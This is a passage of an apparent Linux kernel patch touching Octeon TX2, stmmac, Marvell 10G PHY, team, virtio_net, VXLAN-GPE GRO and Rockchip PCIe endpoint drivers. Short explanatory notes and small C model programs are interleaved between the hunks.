++	for (intf = 0; intf < hw->npc_intfs; intf++) {
++		for (ld = 0; ld < NPC_MAX_LD; ld++) {
++			cfg = rvu_read64(rvu, blkaddr,
++					 NPC_AF_INTFX_LIDX_LTX_LDX_CFG(intf,
++								       NPC_LID_LC,
++								       NPC_LT_LC_IP6,
++								       ld));
++			hdr_offset = FIELD_GET(NPC_HDR_OFFSET, cfg);
++			byte_len = FIELD_GET(NPC_BYTESM, cfg);
++			/* Hashing of the IPv6 source/destination address
++			 * should be enabled if
++			 * hdr_offset == 8 (offset of the source IPv6
++			 * address) or hdr_offset == 24 (offset of the
++			 * destination IPv6 address) and the number of bytes
++			 * to be extracted is 4. As per the hardware
++			 * configuration, byte_len should be the actual byte
++			 * length - 1. Hence byte_len is checked against 3,
++			 * not 4.
++			 */
++			if ((hdr_offset == 8 || hdr_offset == 24) && byte_len == 3)
++				mh->lid_lt_ld_hash_en[intf][NPC_LID_LC][NPC_LT_LC_IP6][ld] = true;
++		}
+ 	}
+ 
++	/* Update hash configuration if the field is hash enabled */
+ 	for (intf = 0; intf < hw->npc_intfs; intf++) {
+ 		npc_program_mkex_hash_rx(rvu, blkaddr, intf);
+ 		npc_program_mkex_hash_tx(rvu, blkaddr, intf);
+@@ -1864,19 +1901,13 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 
+ 	/* Check exact match feature is supported */
+ 	npc_const3 = rvu_read64(rvu, blkaddr, NPC_AF_CONST3);
+-	if (!(npc_const3 & BIT_ULL(62))) {
+-		dev_info(rvu->dev, "%s: No support for exact match support\n",
+-			 __func__);
++	if (!(npc_const3 & BIT_ULL(62)))
+ 		return 0;
+-	}
+ 
+ 	/* Check if kex profile has enabled EXACT match nibble */
+ 	cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_KEX_CFG(NIX_INTF_RX));
+-	if (!(cfg & NPC_EXACT_NIBBLE_HIT)) {
+-		dev_info(rvu->dev, "%s: NPC exact match nibble not enabled in KEX profile\n",
+-			 __func__);
++	if (!(cfg & NPC_EXACT_NIBBLE_HIT))
+ 		return 0;
+-	}
+ 
+ 	/* Set capability to true */
+ 	rvu->hw->cap.npc_exact_match_enabled = true;
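The hash-enable loop above decodes hdr_offset and byte_len from a packed extraction config word with FIELD_GET(). A minimal model of that mask-based decode; the mask positions are illustrative, not the real NPC register layout:

/* Model of the FIELD_GET() decode used above to pull hdr_offset and
 * byte_len out of a packed LDATA config word. */
#include <stdint.h>
#include <stdio.h>

#define DEMO_HDR_OFFSET	0x0000ff00ULL	/* hypothetical NPC_HDR_OFFSET */
#define DEMO_BYTESM	0x000f0000ULL	/* hypothetical NPC_BYTESM */

/* FIELD_GET(mask, val): shift the masked bits down to bit 0 */
static uint64_t field_get(uint64_t mask, uint64_t val)
{
	return (val & mask) >> __builtin_ctzll(mask);
}

int main(void)
{
	uint64_t cfg = (8ULL << 8) | (3ULL << 16);	/* offset 8, len 3 */
	unsigned int hdr_offset = field_get(DEMO_HDR_OFFSET, cfg);
	unsigned int byte_len = field_get(DEMO_BYTESM, cfg);

	/* same test as the hunk: SIP (8) or DIP (24) with 4 extracted
	 * bytes (encoded as 3 = actual length - 1) turns hashing on */
	if ((hdr_offset == 8 || hdr_offset == 24) && byte_len == 3)
		printf("enable 32-bit hash for this extractor\n");
	return 0;
}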
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+index a1c3d987b8044..57a09328d46b5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+@@ -70,8 +70,8 @@ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	[NIX_INTF_RX] = {
+ 		[NPC_LID_LC] = {
+ 			[NPC_LT_LC_IP6] = {
+-				true,
+-				true,
++				false,
++				false,
+ 			},
+ 		},
+ 	},
+@@ -79,8 +79,8 @@ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	[NIX_INTF_TX] = {
+ 		[NPC_LID_LC] = {
+ 			[NPC_LT_LC_IP6] = {
+-				true,
+-				true,
++				false,
++				false,
+ 			},
+ 		},
+ 	},
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c
+index d1c605777985f..7c26394f665e4 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c
+@@ -207,13 +207,15 @@ void stmmac_dwmac4_set_mac_addr(void __iomem *ioaddr, const u8 addr[6],
+ void stmmac_dwmac4_set_mac(void __iomem *ioaddr, bool enable)
+ {
+ 	u32 value = readl(ioaddr + GMAC_CONFIG);
++	u32 old_val = value;
+ 
+ 	if (enable)
+ 		value |= GMAC_CONFIG_RE | GMAC_CONFIG_TE;
+ 	else
+ 		value &= ~(GMAC_CONFIG_TE | GMAC_CONFIG_RE);
+ 
+-	writel(value, ioaddr + GMAC_CONFIG);
++	if (value != old_val)
++		writel(value, ioaddr + GMAC_CONFIG);
+ }
+ 
+ void stmmac_dwmac4_get_mac_addr(void __iomem *ioaddr, unsigned char *addr,
+diff --git a/drivers/net/phy/marvell10g.c b/drivers/net/phy/marvell10g.c
+index 383a9c9f36e54..057d294a273d8 100644
+--- a/drivers/net/phy/marvell10g.c
++++ b/drivers/net/phy/marvell10g.c
+@@ -328,6 +328,13 @@ static int mv3310_power_up(struct phy_device *phydev)
+ 	ret = phy_clear_bits_mmd(phydev, MDIO_MMD_VEND2, MV_V2_PORT_CTRL,
+ 				 MV_V2_PORT_CTRL_PWRDOWN);
+ 
++	/* Sometimes, the power down bit doesn't clear immediately, and
++	 * a read of this register causes the bit not to clear. Delay
++	 * 100us to allow the PHY to come out of power down mode before
++	 * the next access.
++	 */
++	udelay(100);
++
+ 	if (phydev->drv->phy_id != MARVELL_PHY_ID_88X3310 ||
+ 	    priv->firmware_ver < 0x00030000)
+ 		return ret;
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index b524bd374d685..509ba706781ed 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -2135,6 +2135,15 @@ static void team_setup_by_port(struct net_device *dev,
+ 	dev->mtu = port_dev->mtu;
+ 	memcpy(dev->broadcast, port_dev->broadcast, port_dev->addr_len);
+ 	eth_hw_addr_inherit(dev, port_dev);
++
++	if (port_dev->flags & IFF_POINTOPOINT) {
++		dev->flags &= ~(IFF_BROADCAST | IFF_MULTICAST);
++		dev->flags |= (IFF_POINTOPOINT | IFF_NOARP);
++	} else if ((port_dev->flags & (IFF_BROADCAST | IFF_MULTICAST)) ==
++		    (IFF_BROADCAST | IFF_MULTICAST)) {
++		dev->flags |= (IFF_BROADCAST | IFF_MULTICAST);
++		dev->flags &= ~(IFF_POINTOPOINT | IFF_NOARP);
++	}
+ }
+ 
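Like the bonding hunk earlier, team now inherits point-to-point semantics from its port device. A compact model of the flag arithmetic:

/* A point-to-point port strips broadcast/multicast from the aggregate
 * device and marks it P-t-P/NOARP; a normal Ethernet port restores the
 * defaults. Flag bit values are illustrative. */
#include <stdio.h>

#define F_BROADCAST	(1 << 0)
#define F_MULTICAST	(1 << 1)
#define F_POINTOPOINT	(1 << 2)
#define F_NOARP		(1 << 3)

static unsigned int inherit_flags(unsigned int dev, unsigned int port)
{
	if (port & F_POINTOPOINT) {
		dev &= ~(F_BROADCAST | F_MULTICAST);
		dev |= F_POINTOPOINT | F_NOARP;
	} else if ((port & (F_BROADCAST | F_MULTICAST)) ==
		   (F_BROADCAST | F_MULTICAST)) {
		dev |= F_BROADCAST | F_MULTICAST;
		dev &= ~(F_POINTOPOINT | F_NOARP);
	}
	return dev;
}

int main(void)
{
	unsigned int dev = F_BROADCAST | F_MULTICAST;

	dev = inherit_flags(dev, F_POINTOPOINT);	/* e.g. a GRE port */
	printf("flags: %#x\n", dev);			/* P-t-P + NOARP */
	return 0;
}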
+ static int team_dev_type_check_change(struct net_device *dev,
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index fae302c5b0a91..075d5d42f5eb6 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3940,6 +3940,8 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 	if (vi->has_rss || vi->has_rss_hash_report)
+ 		virtnet_init_default_rss(vi);
+ 
++	_virtnet_set_queues(vi, vi->curr_queue_pairs);
++
+ 	/* serialize netdev register + virtio_device_ready() with ndo_open() */
+ 	rtnl_lock();
+ 
+@@ -3960,8 +3962,6 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 		goto free_unregister_netdev;
+ 	}
+ 
+-	virtnet_set_queues(vi, vi->curr_queue_pairs);
+-
+ 	/* Assume link up if device can't report link status,
+ 	   otherwise get link status from config. */
+ 	netif_carrier_off(dev);
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index d4be39b19a6be..0c3eb850fcb79 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -670,6 +670,32 @@ static int vxlan_fdb_append(struct vxlan_fdb *f,
+ 	return 1;
+ }
+ 
++static bool vxlan_parse_gpe_proto(struct vxlanhdr *hdr, __be16 *protocol)
++{
++	struct vxlanhdr_gpe *gpe = (struct vxlanhdr_gpe *)hdr;
++
++	/* Need to have Next Protocol set for interfaces in GPE mode. */
++	if (!gpe->np_applied)
++		return false;
++	/* "The initial version is 0. If a receiver does not support the
++	 * version indicated it MUST drop the packet."
++	 */
++	if (gpe->version != 0)
++		return false;
++	/* "When the O bit is set to 1, the packet is an OAM packet and OAM
++	 * processing MUST occur." However, we don't implement OAM
++	 * processing, thus drop the packet.
++	 */
++	if (gpe->oam_flag)
++		return false;
++
++	*protocol = tun_p_to_eth_p(gpe->next_protocol);
++	if (!*protocol)
++		return false;
++
++	return true;
++}
++
+ static struct vxlanhdr *vxlan_gro_remcsum(struct sk_buff *skb,
+ 					  unsigned int off,
+ 					  struct vxlanhdr *vh, size_t hdrlen,
+@@ -696,26 +722,24 @@ static struct vxlanhdr *vxlan_gro_remcsum(struct sk_buff *skb,
+ 	return vh;
+ }
+ 
+-static struct sk_buff *vxlan_gro_receive(struct sock *sk,
+-					 struct list_head *head,
+-					 struct sk_buff *skb)
++static struct vxlanhdr *vxlan_gro_prepare_receive(struct sock *sk,
++						  struct list_head *head,
++						  struct sk_buff *skb,
++						  struct gro_remcsum *grc)
+ {
+-	struct sk_buff *pp = NULL;
+ 	struct sk_buff *p;
+ 	struct vxlanhdr *vh, *vh2;
+ 	unsigned int hlen, off_vx;
+-	int flush = 1;
+ 	struct vxlan_sock *vs = rcu_dereference_sk_user_data(sk);
+ 	__be32 flags;
+-	struct gro_remcsum grc;
+ 
+-	skb_gro_remcsum_init(&grc);
++	skb_gro_remcsum_init(grc);
+ 
+ 	off_vx = skb_gro_offset(skb);
+ 	hlen = off_vx + sizeof(*vh);
+ 	vh = skb_gro_header(skb, hlen, off_vx);
+ 	if (unlikely(!vh))
+-		goto out;
++		return NULL;
+ 
+ 	skb_gro_postpull_rcsum(skb, vh, sizeof(struct vxlanhdr));
+ 
+@@ -723,12 +747,12 @@ static struct sk_buff *vxlan_gro_receive(struct sock *sk,
+ 
+ 	if ((flags & VXLAN_HF_RCO) && (vs->flags & VXLAN_F_REMCSUM_RX)) {
+ 		vh = vxlan_gro_remcsum(skb, off_vx, vh, sizeof(struct vxlanhdr),
+-				       vh->vx_vni, &grc,
++				       vh->vx_vni, grc,
+ 				       !!(vs->flags &
+ 					  VXLAN_F_REMCSUM_NOPARTIAL));
+ 
+ 		if (!vh)
+-			goto out;
++			return NULL;
+ 	}
+ 
+ 	skb_gro_pull(skb, sizeof(struct vxlanhdr)); /* pull vxlan header */
+@@ -745,12 +769,48 @@ static struct sk_buff *vxlan_gro_receive(struct sock *sk,
+ 		}
+ 	}
+ 
+-	pp = call_gro_receive(eth_gro_receive, head, skb);
+-	flush = 0;
++	return vh;
++}
+ 
+-out:
++static struct sk_buff *vxlan_gro_receive(struct sock *sk,
++					 struct list_head *head,
++					 struct sk_buff *skb)
++{
++	struct sk_buff *pp = NULL;
++	struct gro_remcsum grc;
++	int flush = 1;
++
++	if (vxlan_gro_prepare_receive(sk, head, skb, &grc)) {
++		pp = call_gro_receive(eth_gro_receive, head, skb);
++		flush = 0;
++	}
+ 	skb_gro_flush_final_remcsum(skb, pp, flush, &grc);
++	return pp;
++}
++
++static struct sk_buff *vxlan_gpe_gro_receive(struct sock *sk,
++					     struct list_head *head,
++					     struct sk_buff *skb)
++{
++	const struct packet_offload *ptype;
++	struct sk_buff *pp = NULL;
++	struct gro_remcsum grc;
++	struct vxlanhdr *vh;
++	__be16 protocol;
++	int flush = 1;
+ 
++	vh = vxlan_gro_prepare_receive(sk, head, skb, &grc);
++	if (vh) {
++		if (!vxlan_parse_gpe_proto(vh, &protocol))
++			goto out;
++		ptype = gro_find_receive_by_type(protocol);
++		if (!ptype)
++			goto out;
++		pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
++		flush = 0;
++	}
++out:
++	skb_gro_flush_final_remcsum(skb, pp, flush, &grc);
+ 	return pp;
+ }
+ 
+@@ -762,6 +822,21 @@ static int vxlan_gro_complete(struct sock *sk, struct sk_buff *skb, int nhoff)
+ 	return eth_gro_complete(skb, nhoff + sizeof(struct vxlanhdr));
+ }
+ 
++static int vxlan_gpe_gro_complete(struct sock *sk, struct sk_buff *skb, int nhoff)
++{
++	struct vxlanhdr *vh = (struct vxlanhdr *)(skb->data + nhoff);
++	const struct packet_offload *ptype;
++	int err = -ENOSYS;
++	__be16 protocol;
++
++	if (!vxlan_parse_gpe_proto(vh, &protocol))
++		return err;
++	ptype = gro_find_complete_by_type(protocol);
++	if (ptype)
++		err = ptype->callbacks.gro_complete(skb, nhoff + sizeof(struct vxlanhdr));
++	return err;
++}
++
+ static struct vxlan_fdb *vxlan_fdb_alloc(struct vxlan_dev *vxlan, const u8 *mac,
+ 					 __u16 state, __be32 src_vni,
+ 					 __u16 ndm_flags)
+@@ -1572,35 +1647,6 @@ out:
+ 	unparsed->vx_flags &= ~VXLAN_GBP_USED_BITS;
+ }
+ 
+-static bool vxlan_parse_gpe_hdr(struct vxlanhdr *unparsed,
+-				__be16 *protocol,
+-				struct sk_buff *skb, u32 vxflags)
+-{
+-	struct vxlanhdr_gpe *gpe = (struct vxlanhdr_gpe *)unparsed;
+-
+-	/* Need to have Next Protocol set for interfaces in GPE mode. */
+-	if (!gpe->np_applied)
+-		return false;
+-	/* "The initial version is 0. If a receiver does not support the
+-	 * version indicated it MUST drop the packet.
+-	 */
+-	if (gpe->version != 0)
+-		return false;
+-	/* "When the O bit is set to 1, the packet is an OAM packet and OAM
+-	 * processing MUST occur." However, we don't implement OAM
+-	 * processing, thus drop the packet.
+-	 */
+-	if (gpe->oam_flag)
+-		return false;
+-
+-	*protocol = tun_p_to_eth_p(gpe->next_protocol);
+-	if (!*protocol)
+-		return false;
+-
+-	unparsed->vx_flags &= ~VXLAN_GPE_USED_BITS;
+-	return true;
+-}
+-
+ static bool vxlan_set_mac(struct vxlan_dev *vxlan,
+ 			  struct vxlan_sock *vs,
+ 			  struct sk_buff *skb, __be32 vni)
+@@ -1702,8 +1748,9 @@ static int vxlan_rcv(struct sock *sk, struct sk_buff *skb)
+ 	 * used by VXLAN extensions if explicitly requested.
+ 	 */
+ 	if (vs->flags & VXLAN_F_GPE) {
+-		if (!vxlan_parse_gpe_hdr(&unparsed, &protocol, skb, vs->flags))
++		if (!vxlan_parse_gpe_proto(&unparsed, &protocol))
+ 			goto drop;
++		unparsed.vx_flags &= ~VXLAN_GPE_USED_BITS;
+ 		raw_proto = true;
+ 	}
+ 
+@@ -2584,7 +2631,7 @@ static void vxlan_xmit_one(struct sk_buff *skb, struct net_device *dev,
+ 		}
+ 
+ 		ndst = &rt->dst;
+-		err = skb_tunnel_check_pmtu(skb, ndst, VXLAN_HEADROOM,
++		err = skb_tunnel_check_pmtu(skb, ndst, vxlan_headroom(flags & VXLAN_F_GPE),
+ 					    netif_is_any_bridge_port(dev));
+ 		if (err < 0) {
+ 			goto tx_error;
+@@ -2645,7 +2692,8 @@ static void vxlan_xmit_one(struct sk_buff *skb, struct net_device *dev,
+ 				goto out_unlock;
+ 		}
+ 
+-		err = skb_tunnel_check_pmtu(skb, ndst, VXLAN6_HEADROOM,
++		err = skb_tunnel_check_pmtu(skb, ndst,
++					    vxlan_headroom((flags & VXLAN_F_GPE) | VXLAN_F_IPV6),
+ 					    netif_is_any_bridge_port(dev));
+ 		if (err < 0) {
+ 			goto tx_error;
+@@ -3034,14 +3082,12 @@ static int vxlan_change_mtu(struct net_device *dev, int new_mtu)
+ 	struct vxlan_rdst *dst = &vxlan->default_dst;
+ 	struct net_device *lowerdev = __dev_get_by_index(vxlan->net,
+ 							 dst->remote_ifindex);
+-	bool use_ipv6 = !!(vxlan->cfg.flags & VXLAN_F_IPV6);
+ 
+ 	/* This check is different than dev->max_mtu, because it looks at
+ 	 * the lowerdev->mtu, rather than the static dev->max_mtu
+ 	 */
+ 	if (lowerdev) {
+-		int max_mtu = lowerdev->mtu -
+-			      (use_ipv6 ? VXLAN6_HEADROOM : VXLAN_HEADROOM);
++		int max_mtu = lowerdev->mtu - vxlan_headroom(vxlan->cfg.flags);
+ 		if (new_mtu > max_mtu)
+ 			return -EINVAL;
+ 	}
+@@ -3419,8 +3465,13 @@ static struct vxlan_sock *vxlan_socket_create(struct net *net, bool ipv6,
+ 	tunnel_cfg.encap_rcv = vxlan_rcv;
+ 	tunnel_cfg.encap_err_lookup = vxlan_err_lookup;
+ 	tunnel_cfg.encap_destroy = NULL;
+-	tunnel_cfg.gro_receive = vxlan_gro_receive;
+-	tunnel_cfg.gro_complete = vxlan_gro_complete;
++	if (vs->flags & VXLAN_F_GPE) {
++		tunnel_cfg.gro_receive = vxlan_gpe_gro_receive;
++		tunnel_cfg.gro_complete = vxlan_gpe_gro_complete;
++	} else {
++		tunnel_cfg.gro_receive = vxlan_gro_receive;
++		tunnel_cfg.gro_complete = vxlan_gro_complete;
++	}
+ 
+ 	setup_udp_tunnel_sock(net, sock, &tunnel_cfg);
+ 
+@@ -3684,11 +3735,11 @@ static void vxlan_config_apply(struct net_device *dev,
+ 	struct vxlan_dev *vxlan = netdev_priv(dev);
+ 	struct vxlan_rdst *dst = &vxlan->default_dst;
+ 	unsigned short needed_headroom = ETH_HLEN;
+-	bool use_ipv6 = !!(conf->flags & VXLAN_F_IPV6);
+ 	int max_mtu = ETH_MAX_MTU;
++	u32 flags = conf->flags;
+ 
+ 	if (!changelink) {
+-		if (conf->flags & VXLAN_F_GPE)
++		if (flags & VXLAN_F_GPE)
+ 			vxlan_raw_setup(dev);
+ 		else
+ 			vxlan_ether_setup(dev);
+@@ -3713,8 +3764,7 @@ static void vxlan_config_apply(struct net_device *dev,
+ 
+ 		dev->needed_tailroom = lowerdev->needed_tailroom;
+ 
+-		max_mtu = lowerdev->mtu - (use_ipv6 ? VXLAN6_HEADROOM :
+-					   VXLAN_HEADROOM);
++		max_mtu = lowerdev->mtu - vxlan_headroom(flags);
+ 		if (max_mtu < ETH_MIN_MTU)
+ 			max_mtu = ETH_MIN_MTU;
+ 
+@@ -3725,10 +3775,9 @@ static void vxlan_config_apply(struct net_device *dev,
+ 	if (dev->mtu > max_mtu)
+ 		dev->mtu = max_mtu;
+ 
+-	if (use_ipv6 || conf->flags & VXLAN_F_COLLECT_METADATA)
+-		needed_headroom += VXLAN6_HEADROOM;
+-	else
+-		needed_headroom += VXLAN_HEADROOM;
++	if (flags & VXLAN_F_COLLECT_METADATA)
++		flags |= VXLAN_F_IPV6;
++	needed_headroom += vxlan_headroom(flags);
+ 	dev->needed_headroom = needed_headroom;
+ 
+ 	memcpy(&vxlan->cfg, conf, sizeof(*conf));
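The hunks above replace the fixed VXLAN_HEADROOM/VXLAN6_HEADROOM constants with a flag-driven vxlan_headroom() helper. A hedged sketch of what such a helper computes — GPE frames carry no inner Ethernet header — using plain byte counts and illustrative flag bits instead of the kernel's header structs:

/* Sketch of the headroom computation the hunks above start using. */
#include <stdio.h>

#define VXLAN_F_GPE	(1u << 0)	/* illustrative bit positions */
#define VXLAN_F_IPV6	(1u << 1)

static unsigned short vxlan_headroom(unsigned int flags)
{
	unsigned short ip = (flags & VXLAN_F_IPV6) ? 40 : 20; /* ip6/ip4 hdr */
	unsigned short udp = 8, vxlan = 8, eth = 14;

	/* VXLAN:     IP header + UDP + VXLAN + inner Ethernet header
	 * VXLAN-GPE: IP header + UDP + VXLAN (raw inner protocol)   */
	return ip + udp + vxlan + ((flags & VXLAN_F_GPE) ? 0 : eth);
}

int main(void)
{
	printf("v4: %u, v6+gpe: %u\n", vxlan_headroom(0),
	       vxlan_headroom(VXLAN_F_IPV6 | VXLAN_F_GPE));
	return 0;
}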
+diff --git a/drivers/pci/controller/pcie-rockchip-ep.c b/drivers/pci/controller/pcie-rockchip-ep.c
+index 827d91e73efab..0af0e965fb57e 100644
+--- a/drivers/pci/controller/pcie-rockchip-ep.c
++++ b/drivers/pci/controller/pcie-rockchip-ep.c
+@@ -61,65 +61,32 @@ static void rockchip_pcie_clear_ep_ob_atu(struct rockchip_pcie *rockchip,
+ 			    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(region));
+ 	rockchip_pcie_write(rockchip, 0,
+ 			    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(region));
+-	rockchip_pcie_write(rockchip, 0,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR0(region));
+-	rockchip_pcie_write(rockchip, 0,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR1(region));
+ }
+ 
+ static void rockchip_pcie_prog_ep_ob_atu(struct rockchip_pcie *rockchip, u8 fn,
+-					 u32 r, u32 type, u64 cpu_addr,
+-					 u64 pci_addr, size_t size)
++					 u32 r, u64 cpu_addr, u64 pci_addr,
++					 size_t size)
+ {
+-	u64 sz = 1ULL << fls64(size - 1);
+-	int num_pass_bits = ilog2(sz);
+-	u32 addr0, addr1, desc0, desc1;
+-	bool is_nor_msg = (type == AXI_WRAPPER_NOR_MSG);
++	int num_pass_bits = fls64(size - 1);
++	u32 addr0, addr1, desc0;
+ 
+-	/* The minimal region size is 1MB */
+ 	if (num_pass_bits < 8)
+ 		num_pass_bits = 8;
+ 
+-	cpu_addr -= rockchip->mem_res->start;
+-	addr0 = ((is_nor_msg ? 0x10 : (num_pass_bits - 1)) &
+-		PCIE_CORE_OB_REGION_ADDR0_NUM_BITS) |
+-		(lower_32_bits(cpu_addr) & PCIE_CORE_OB_REGION_ADDR0_LO_ADDR);
+-	addr1 = upper_32_bits(is_nor_msg ? cpu_addr : pci_addr);
+-	desc0 = ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN(fn) | type;
+-	desc1 = 0;
+-
+-	if (is_nor_msg) {
+-		rockchip_pcie_write(rockchip, 0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r));
+-		rockchip_pcie_write(rockchip, 0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r));
+-		rockchip_pcie_write(rockchip, desc0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r));
+-		rockchip_pcie_write(rockchip, desc1,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r));
+-	} else {
+-		/* PCI bus address region */
+-		rockchip_pcie_write(rockchip, addr0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r));
+-		rockchip_pcie_write(rockchip, addr1,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r));
+-		rockchip_pcie_write(rockchip, desc0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r));
+-		rockchip_pcie_write(rockchip, desc1,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r));
+-
+-		addr0 =
+-		    ((num_pass_bits - 1) & PCIE_CORE_OB_REGION_ADDR0_NUM_BITS) |
+-		    (lower_32_bits(cpu_addr) &
+-		     PCIE_CORE_OB_REGION_ADDR0_LO_ADDR);
+-		addr1 = upper_32_bits(cpu_addr);
+-	}
++	addr0 = ((num_pass_bits - 1) & PCIE_CORE_OB_REGION_ADDR0_NUM_BITS) |
++		(lower_32_bits(pci_addr) & PCIE_CORE_OB_REGION_ADDR0_LO_ADDR);
++	addr1 = upper_32_bits(pci_addr);
++	desc0 = ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN(fn) | AXI_WRAPPER_MEM_WRITE;
+ 
+-	/* CPU bus address region */
++	/* PCI bus address region */
+ 	rockchip_pcie_write(rockchip, addr0,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR0(r));
++			    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r));
+ 	rockchip_pcie_write(rockchip, addr1,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR1(r));
++			    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r));
++	rockchip_pcie_write(rockchip, desc0,
++			    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r));
++	rockchip_pcie_write(rockchip, 0,
++			    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r));
+ }
+ 
+ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+@@ -258,26 +225,20 @@ static void rockchip_pcie_ep_clear_bar(struct pci_epc *epc, u8 fn, u8 vfn,
+ 			    ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR1(fn, bar));
+ }
+ 
++static inline u32 rockchip_ob_region(phys_addr_t addr)
++{
++	return (addr >> ilog2(SZ_1M)) & 0x1f;
++}
++
+ static int rockchip_pcie_ep_map_addr(struct pci_epc *epc, u8 fn, u8 vfn,
+ 				     phys_addr_t addr, u64 pci_addr,
+ 				     size_t size)
+ {
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *pcie = &ep->rockchip;
+-	u32 r;
+-
+-	r = find_first_zero_bit(&ep->ob_region_map, BITS_PER_LONG);
+-	/*
+-	 * Region 0 is reserved for configuration space and shouldn't
+-	 * be used elsewhere per TRM, so leave it out.
+-	 */
+-	if (r >= ep->max_regions - 1) {
+-		dev_err(&epc->dev, "no free outbound region\n");
+-		return -EINVAL;
+-	}
++	u32 r = rockchip_ob_region(addr);
+ 
+-	rockchip_pcie_prog_ep_ob_atu(pcie, fn, r, AXI_WRAPPER_MEM_WRITE, addr,
+-				     pci_addr, size);
++	rockchip_pcie_prog_ep_ob_atu(pcie, fn, r, addr, pci_addr, size);
+ 
+ 	set_bit(r, &ep->ob_region_map);
+ 	ep->ob_addr[r] = addr;
+@@ -292,15 +253,11 @@ static void rockchip_pcie_ep_unmap_addr(struct pci_epc *epc, u8 fn, u8 vfn,
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+ 	u32 r;
+ 
+-	for (r = 0; r < ep->max_regions - 1; r++)
++	for (r = 0; r < ep->max_regions; r++)
+ 		if (ep->ob_addr[r] == addr)
+ 			break;
+ 
+-	/*
+-	 * Region 0 is reserved for configuration space and shouldn't
+-	 * be used elsewhere per TRM, so leave it out.
+-	 */
+-	if (r == ep->max_regions - 1)
++	if (r == ep->max_regions)
+ 		return;
+ 
+ 	rockchip_pcie_clear_ep_ob_atu(rockchip, r);
+@@ -397,7 +354,8 @@ static int rockchip_pcie_ep_send_msi_irq(struct rockchip_pcie_ep *ep, u8 fn,
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+ 	u32 flags, mme, data, data_mask;
+ 	u8 msi_count;
+-	u64 pci_addr, pci_addr_mask = 0xff;
++	u64 pci_addr;
++	u32 r;
+ 
+ 	/* Check MSI enable bit */
+ 	flags = rockchip_pcie_read(&ep->rockchip,
+@@ -431,21 +389,20 @@ static int rockchip_pcie_ep_send_msi_irq(struct rockchip_pcie_ep *ep, u8 fn,
+ 				       ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+ 				       ROCKCHIP_PCIE_EP_MSI_CTRL_REG +
+ 				       PCI_MSI_ADDRESS_LO);
+-	pci_addr &= GENMASK_ULL(63, 2);
+ 
+ 	/* Set the outbound region if needed. */
+-	if (unlikely(ep->irq_pci_addr != (pci_addr & ~pci_addr_mask) ||
++	if (unlikely(ep->irq_pci_addr != (pci_addr & PCIE_ADDR_MASK) ||
+ 		     ep->irq_pci_fn != fn)) {
+-		rockchip_pcie_prog_ep_ob_atu(rockchip, fn, ep->max_regions - 1,
+-					     AXI_WRAPPER_MEM_WRITE,
++		r = rockchip_ob_region(ep->irq_phys_addr);
++		rockchip_pcie_prog_ep_ob_atu(rockchip, fn, r,
+ 					     ep->irq_phys_addr,
+-					     pci_addr & ~pci_addr_mask,
+-					     pci_addr_mask + 1);
+-		ep->irq_pci_addr = (pci_addr & ~pci_addr_mask);
++					     pci_addr & PCIE_ADDR_MASK,
++					     ~PCIE_ADDR_MASK + 1);
++		ep->irq_pci_addr = (pci_addr & PCIE_ADDR_MASK);
+ 		ep->irq_pci_fn = fn;
+ 	}
+ 
+-	writew(data, ep->irq_cpu_addr + (pci_addr & pci_addr_mask));
++	writew(data, ep->irq_cpu_addr + (pci_addr & ~PCIE_ADDR_MASK));
+ 	return 0;
+ }
+ 
